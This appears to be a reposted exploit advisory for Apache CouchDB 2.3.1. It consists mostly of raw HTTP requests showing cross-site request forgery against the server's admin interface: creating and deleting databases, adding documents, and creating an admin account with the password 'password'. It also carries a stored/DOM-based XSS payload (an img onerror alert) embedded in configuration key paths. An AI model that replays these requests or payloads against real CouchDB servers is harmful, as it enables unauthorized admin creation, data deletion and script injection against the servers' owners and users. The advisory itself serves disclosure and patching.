Exploit/Advisories

Published on March 26th, 2019 📆 | 6442 Views ⚑

0

Apache CouchDB 2.3.1 Cross Site Request Forgery / Cross Site Scripting


iSpeech

##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################

Introduction

A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.

#################################################################################

Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored

#################################################################################

CSRF1

Create Database

PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"id":"test","name":"test"}

#################################################################################

CSRF2

Delete Database

DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

#################################################################################

CSRF3

Create Document





POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249

{"testdoc":"test"}

#################################################################################

CSRF4

Create Admin

PUT /_node/[email protected]/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"password"

#################################################################################

CSRF5 & XSS1 | DOM Based & Stored - Add Option

PUT /_node/[email protected]/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

"test"

#################################################################################

CSRF6 & XSS2 | DOM Based & Stored - Delete Option

DELETE /_node/[email protected]/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0

#################################################################################

(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "http://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=409115965821184";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑